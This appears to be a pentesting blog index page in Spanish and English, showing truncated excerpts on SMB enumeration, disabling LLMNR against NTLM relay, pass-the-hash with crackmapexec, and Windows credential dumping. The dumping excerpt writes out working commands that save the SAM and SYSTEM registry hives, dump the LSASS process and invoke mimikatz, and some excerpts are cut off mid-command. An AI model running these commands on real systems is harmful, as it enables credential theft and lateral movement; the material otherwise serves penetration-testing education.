Pentesting SMB Para realizar un listado recursivo -R, y con -p en lugar de la contraseña se puede usar el hash “NT:LM”

NTLM Relay Remediación Disabling LLMNR Open the Group Policy Editor in your version of Windows Navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client Under DNS Client, make sure that “Turn OFF Multicast Name Read more ›

Diferentes maneras de emplear el Pass the Hash (PTH) Crackmapexec cme smb -u user -H BD1C6503987F8FF006296118F359FA79  -d domain.localSMB     445    PC01      [*] Windows Server 2012 R2 Standard 9600 x64 (name:PC01) (domain:domain.local) (signing:False) (SMBv1:True)SMB Read more ›

Dump credentials, hash ntlm v1, pth, cracking hash ntlm Registros C:> reg.exe save hklm\sam c:\temp\sam.saveC:> reg.exe save hklm\security c:\temp\security.saveC:> reg.exe save hklm\system c:\temp\ Password Hashes (Impacket) $ -sam -security -system LOCAL Credenciales en memoria (Procdump) C:> procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1 C:> mimikatz.exe Read more ›